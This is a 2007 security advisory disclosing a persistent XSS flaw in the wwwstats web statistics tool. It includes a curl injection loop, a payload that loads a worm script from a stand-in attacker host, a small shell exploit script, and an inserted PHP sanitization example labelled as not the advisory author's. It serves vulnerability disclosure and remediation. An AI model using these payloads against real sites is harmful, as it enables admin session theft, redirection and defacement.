Message-ID: <47592F27.6030000@isecauditors.com>
Date: Fri, 07 Dec 2007 12:31:51 +0100
From: ISecAuditors Security Advisories <advisories@...cauditors.com>
To: bugtraq@...urityfocus.com
Subject: [ISecAuditors Security Advisories]  wwwstats is vulnerable to Persistent XSS

=============================================
INTERNET SECURITY AUDITORS ALERT 2007-004
- Original release date: November 7th, 2007
- Last revised:  December 7th, 2007
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=============================================

I. VULNERABILITY
-------------------------
wwwstats is vulnerable to Persistent XSS

II. BACKGROUND
-------------------------
wwwstats is a very widely used web traffic analyser that records in a
database the user agents, referers, downloads, etc.

III. DESCRIPTION
-------------------------
It is possible to inject HTML and JavaScript into the database by calling
the clickstats.php code directly. This allows web defacement, theft of
admin sessions, web redirection and XSS worms.

To bypass the first 'if', it is necessary to fill the HTTP Referer header
with something and to inject the link into the database via the link GET
parameter.

Using the link parameter or the User-Agent field, an attacker can inject
a script that steals the admin's cookies, defaces the site, or does
anything else...

Magic quotes configured in php.ini do not prevent this: in JavaScript,
\'test\' is still interpreted as 'test'.

IV. PROOF OF CONCEPT
-------------------------
By controlling the number of iterations, it is possible to place the
injection at the ranking position you want:

 while [ 1 ]; do
   curl 'http://web.com/wwwstats/clickstats.php?link=<script>XXXX</scrip>' -e 'xxx'
 done

The User-Agent field can be attacked the same way (curl's -A 'attack').

A payload can be:

  <script scr='http://evilsite.com/XSSWorm.js'></script>


------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com

if [ $# -ne 4 ]
then
     echo "Usage:   $0 <target>
     <html or javascript to inject in downloads> <ranking position>"
     echo "Example: $0 http://www.victym.com/wwwstats
     <script>window.location="http://www.evilhost.com"</script> 100"
     exit
fi

echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done
--------------------------------

V. BUSINESS IMPACT
-------------------------
A defacement or redirection can damage the corporate image.

VI. SYSTEMS AFFECTED
-------------------------
wwwstats v3.21 and prior (all)

VII. SOLUTION
-------------------------
Sanitize the inputs. Update to version 3.22.
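The following is an added example, not code from wwwstats or from the advisory author, showing what "sanitize the inputs" means for the two values this advisory is about (the link GET parameter and the User-Agent header) and why the magic_quotes setting mentioned in section III is not a fix. Function names, the length limits and the constructed sample values are assumptions made for this example; the fix is to reject links that are not plain http(s) URLs before they reach the database, and to entity-encode every stored value when the ranking page is rendered.

```php
<?php
// Added example (not wwwstats code): validate the "link" and User-Agent
// values before storing them, and entity-encode them when rendering.
// Names, limits and sample values below are assumptions for this example.

declare(strict_types=1);

const MAX_LINK_LEN = 2048; // assumed limit
const MAX_UA_LEN   = 512;  // assumed limit

/**
 * Accept a click-tracking link only if it is an absolute http(s) URL with
 * no control characters or HTML metacharacters. Returns null on rejection.
 */
function validate_link(string $link): ?string
{
    if ($link === '' || strlen($link) > MAX_LINK_LEN) {
        return null;
    }
    // Angle brackets, quotes and control bytes never belong in a tracked URL.
    if (preg_match('/[\x00-\x1f\x7f<>"\']/', $link)) {
        return null;
    }
    if (filter_var($link, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($link, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null; // rejects javascript:, data:, and similar schemes
    }
    return $link;
}

/**
 * Keep a User-Agent string for statistics, but drop anything outside
 * printable ASCII and cap the length. The result is still untrusted data
 * and must be encoded on output like everything else.
 */
function sanitize_user_agent(string $ua): string
{
    $ua = preg_replace('/[^\x20-\x7e]/', '', $ua) ?? '';
    return substr($ua, 0, MAX_UA_LEN);
}

/** Encode a stored value for use in HTML text or a quoted attribute. */
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Render one ranking row with every database value encoded. */
function render_row(int $rank, string $link, string $ua): string
{
    $safeLink = html_out($link);
    return sprintf(
        '<tr><td>%d</td><td><a href="%s" rel="noopener noreferrer">%s</a></td><td>%s</td></tr>',
        $rank, $safeLink, $safeLink, html_out($ua)
    );
}

// --- demonstration on constructed inputs ---
$payload = "<script src='http://example.invalid/x.js'></script>"; // constructed sample

// Magic quotes (and addslashes) only backslash-escape the quotes; the tags
// survive intact, which is the advisory's point about magic_quotes.
echo "addslashes: " . addslashes($payload) . "\n";

// Input validation rejects the payload before it is stored.
var_dump(validate_link($payload));                      // NULL
var_dump(validate_link('http://example.invalid/page')); // the URL itself

// Output encoding neutralises anything that was stored before the fix.
echo render_row(1, 'http://example.invalid/page', sanitize_user_agent($payload)), "\n";
```

Validation and output encoding are deliberately separate steps: validation keeps junk out of the ranking table, while encoding at render time protects against rows that were inserted before the fix or through another path. The addslashes() line reproduces what magic_quotes_gpc would have done to the same value, which is why the advisory treats that setting as irrelevant.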

VIII. REFERENCES
-------------------------
http://www.timeprog.com/wwwstats/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
November 07, 2007: Initial release
November 09, 2007: Added POC

XI. DISCLOSURE TIMELINE
-------------------------
November 07, 2007: Vulnerability acquired by Jesus Olmos Gonzalez
                   Internet Security Auditors (www.isecauditors.com)
November 08, 2007: Developer contacted
November 08, 2007: Response and correction started.
November 26, 2007: Update Available.
December 07, 2007: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
